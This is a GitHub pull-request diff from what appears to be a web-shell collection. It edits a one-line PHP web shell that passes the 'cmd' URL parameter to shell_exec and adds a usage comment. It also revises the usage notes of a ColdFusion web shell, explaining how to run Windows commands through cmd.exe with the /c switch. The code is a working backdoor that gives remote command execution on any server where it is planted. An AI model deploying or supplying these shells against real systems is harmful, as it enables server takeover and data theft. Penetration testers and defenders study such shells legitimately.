Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 4 additions & 1 deletion shells/cmd.php
Original file line number Diff line number Diff line change
@@ -1 +1,4 @@
<?php echo shell_exec($_GET['cmd']);?>
<?php
//Usage: add ?cmd= to request url
echo shell_exec($_GET['cmd']);
?>
5 changes: 3 additions & 2 deletions shells/webshell.cfm
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,9 @@
<!-- additshonz: lawKnee -->
<b>Notes:</b><br>
<ul>
<li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run "dir" "type" etc
<li>For Windows put this as command "c:\windows\system32\cmd.exe" or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run "/c dir" "/c type" etc
<li>/c swich is needed for cmd.exe - Carries out the command specified by string and then terminates
</ul>
<p>

Expand Down